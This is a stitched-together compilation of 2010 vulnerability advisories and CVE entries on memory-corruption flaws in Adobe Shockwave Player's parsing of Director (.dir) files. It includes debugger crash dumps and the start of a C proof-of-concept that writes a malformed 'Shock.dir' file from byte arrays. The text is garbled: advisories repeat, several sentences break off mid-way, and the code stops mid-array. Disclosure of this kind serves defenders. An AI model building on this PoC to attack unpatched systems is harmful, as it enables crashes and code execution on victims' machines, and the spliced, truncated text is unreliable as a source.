Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0101 | CVE-2010-1281 | Adobe Shockwave Player of iml32.dll Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
iml32.dll in Adobe Shockwave Player before 11.5.7.609 does not validate a certain value from a file before using it in file-pointer calculations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted .dir (aka Director) file. User interaction is required in that a target visit a malicious website.The specific flaw exists within the code responsible for parsing Director files. The vulnerable function is exported as an ordinal from the iml32.dll module. Ordinal 1409 trusts a value from the file as an offset and updates pointers accordingly. By crafting a large enough value and seeking the file pointer past the end of a buffer this can be abused to corrupt heap memory. An attacker can abuse this to execute arbitrary code under the context of the user running the browser. Failed exploit attempts may cause a denial-of-service condition.
Versions prior to Shockwave Player 11.5.7.609 are vulnerable.
Note: This issue was previously covered in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities); it has been given its own record to better document it. Over 450 million Internet-enabled desktops have installed Adobe Shockwave Player. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
-- Disclosure Timeline:
2010-02-02 - Vulnerability reported to vendor
2010-05-11 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201005-0053 | CVE-2010-0130 | Adobe Shockwave Player Integer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Integer overflow in Adobe Shockwave Player before 11.5.7.609 might allow remote attackers to execute arbitrary code via a crafted .dir (aka Director) file. Adobe Shockwave Player is prone to a remote-code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English).
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"Over 450 million Internet-enabled desktops have installed Adobe
Shockwave Player. ".dir") is opened.
======================================================================
6) Time Table
08/03/2010 - Vendor notified.
08/03/2010 - Vendor response.
12/05/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0130 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-22/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0100 | CVE-2010-1280 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted .dir (aka Director) file, related to (1) an erroneous dereference and (2) a certain Shock.dir file.
Attackers can exploit these issues to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts may cause a denial-of-service condition.
Versions prior to Shockwave Player 11.5.7.609 are vulnerable.
NOTE: These issues were previously covered in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities); they have been given their own record to better document them. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). Director) file is related to (1) incorrect dereferencing and (2) the Shock.dir file.
These people now have access to some of the best the Web has to offer - including
dazzling 3D games and entertainment, interactive product demonstrations, and online
learning applications. The vulnerable software fails to sanitize user input when
processing .dir files resulting in a crash and overwrite of a few memory registers.
Tested on: Microsoft Windows XP Professional SP3 (English)
Version tested: 11.5.6.606
====================================================================================================
(f94.ae4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8
eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206
*** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll -
DIRAPI!Ordinal14+0x3b16:
68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????
----------------------------------------------------------------------------------------------------
EAX FFFFFFFF
ECX 41414141
EDX FFFFFFFF
EBX 00000018
ESP 0012F3B4
EBP 02793578
ESI 0012F3C4
EDI 02793578
EIP 69009F1F IML32.69009F1F
====================================================================================================
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - Macedonian Information Security Research & Development Laboratory
http://www.zeroscience.mk
19.09.2009
Zero Science Lab Advisory ID: ZSL-2010-4937
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Adobe Advisory ID: APSB10-12
Advisory: http://www.adobe.com/support/security/bulletins/apsb10-12.html
CVE ID: CVE-2010-1280
Disclosure timeline: [19.09.2009] Vulnerability discovered.
[09.03.2010] Vendor contacted with sent PoC files.
[09.03.2010] Vendor replied.
[21.03.2010] Asked vendor for confirmation.
[21.03.2010] Vendor verifies the weakness.
[06.05.2010] Vendor reveals patch release date.
[11.05.2010] Coordinated public advisory.
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#define FFORMAT "Shock.dir"
FILE *fp;
char shocks[] = {
0x58, 0x46, 0x49, 0x52, 0x2C, 0x23, 0x00, 0x00, 0x33, 0x39, 0x56, 0x4D, 0x70, 0x61, 0x6D, 0x69,
0x18, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x82, 0x07, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x61, 0x6D, 0x6D,
0x38, 0x03, 0x00, 0x00, 0x18, 0x00, 0x14, 0x00, 0x28, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00,
0x18, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x17, 0x00, 0x00, 0x00, 0x58, 0x46, 0x49, 0x52,
0x2C, 0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x70, 0x61, 0x6D, 0x69, 0x18, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x88, 0x8F, 0xE2, 0x0B, 0x70, 0x61, 0x6D, 0x6D, 0x38, 0x03, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xE4, 0x6A, 0xE2, 0x0B, 0x2A, 0x59, 0x45, 0x4B, 0x74, 0x01, 0x00, 0x00,
0x6C, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x74, 0x53, 0x41, 0x43,
0x93, 0x00, 0x00, 0x00, 0xE4, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x2A, 0x53, 0x41, 0x43, 0x04, 0x00, 0x00, 0x00, 0xD8, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x58, 0x74, 0x63, 0x4C, 0x6C, 0x00, 0x00, 0x00, 0x80, 0x1C, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A, 0x00, 0x00, 0x00, 0x00,
0x86, 0x20, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A,
0x00, 0x00, 0x00, 0x00, 0x7E, 0x20, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00 //252
};
char shocke[] = {
0x66, 0x6E, 0x69, 0x43, 0x3C, 0x00, 0x00, 0x00, 0x94, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x6D, 0x61, 0x6E, 0x4C, 0x81, 0x03, 0x00, 0x00, 0xF4, 0x1C, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6D, 0x75, 0x68, 0x54, 0xC2, 0x00, 0x00, 0x00,
0x6A, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x43, 0x52, 0x44,
0x64, 0x00, 0x00, 0x00, 0xE8, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x70, 0x6D, 0x58, 0x46, 0xEE, 0x0E, 0x00, 0x00, 0x74, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x4C, 0x73, 0x43, 0x4D, 0x3A, 0x00, 0x00, 0x00, 0xF6, 0x18, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64, 0x72, 0x6F, 0x53, 0x18, 0x00, 0x00, 0x00,
0x54, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49, 0x46, 0x57, 0x56,
0xA8, 0x00, 0x00, 0x00, 0x8E, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x43, 0x53, 0x57, 0x56, 0xF8, 0x00, 0x00, 0x00, 0x3E, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A, 0x00, 0x00, 0x00, 0x00, 0x54, 0x22, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x42, 0x4C, 0x57, 0x56, 0x06, 0x00, 0x00, 0x00,
0x46, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x65, 0x72, 0x66,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF,
0x6E, 0x61, 0x68, 0x43, 0x06, 0x00, 0x00, 0x00, 0x5C, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x6C, 0x52, 0x54, 0x58, 0x83, 0x04, 0x00, 0x00, 0x6A, 0x14, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x65, 0x65, 0x72, 0x66, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x6B, 0x6E, 0x75, 0x6A,
0x00, 0x00, 0x00, 0x00, 0x3E, 0x22, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00,
0x53, 0x52, 0x45, 0x56, 0x0C, 0x00, 0x00, 0x00, 0x38, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x4C, 0x4F, 0x43, 0x46, 0x38, 0x00, 0x00, 0x00, 0x4C, 0x19, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x42, 0x55, 0x50, 0x99, 0x01, 0x00, 0x00,
0x8C, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x49, 0x52, 0x47,
0x10, 0x00, 0x00, 0x00, 0x2E, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x4C, 0x46, 0x44, 0x4D, 0x06, 0x00, 0x00, 0x00, 0x46, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00, 0x54, 0x1B, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x18, 0x00, 0x00, 0x00,
0x74, 0x1B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2A, 0x59, 0x45, 0x4B,
0x74, 0x01, 0x00, 0x00, 0x0C, 0x00, 0x0C, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,
0x0B, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x6D, 0x75, 0x68, 0x54, 0x15, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x6E, 0x61, 0x68, 0x43, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
0x46, 0x43, 0x52, 0x44, 0x1A, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x4F, 0x43, 0x46,
0x0D, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x70, 0x6D, 0x58, 0x46, 0x1C, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x44, 0x49, 0x52, 0x47, 0x0E, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
0x4C, 0x73, 0x43, 0x4D, 0x1D, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x46, 0x44, 0x4D,
0x1B, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4C, 0x42, 0x55, 0x50, 0x1E, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x46, 0x52, 0x43, 0x53, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
0x64, 0x72, 0x6F, 0x53, 0x19, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x53, 0x52, 0x45, 0x56,
0x10, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x49, 0x46, 0x57, 0x56, 0x13, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x42, 0x4C, 0x57, 0x56, 0x11, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
0x43, 0x53, 0x57, 0x56, 0x16, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x6C, 0x52, 0x54, 0x58,
